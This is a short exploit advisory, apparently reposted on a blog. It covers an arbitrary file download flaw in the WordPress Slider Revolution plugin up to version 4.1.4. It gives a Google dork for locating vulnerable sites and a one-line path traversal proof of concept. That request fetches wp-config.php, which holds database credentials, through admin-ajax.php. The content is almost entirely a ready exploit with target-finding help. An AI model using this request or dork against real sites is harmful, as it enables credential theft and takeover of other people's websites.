WordPress Slider Revolution 4.1.4 Arbitrary File Download vulnerability

 
 
 
 
######################
# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380

# Software Link : Premium plugin

# Dork Google: revslider.php "index of"
               

# Date : 2014-07-24

# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox


######################

# Description

Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability


######################

# PoC

http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


#####################


#####################

SHARE THIS

Author:

Previous Post
Next Post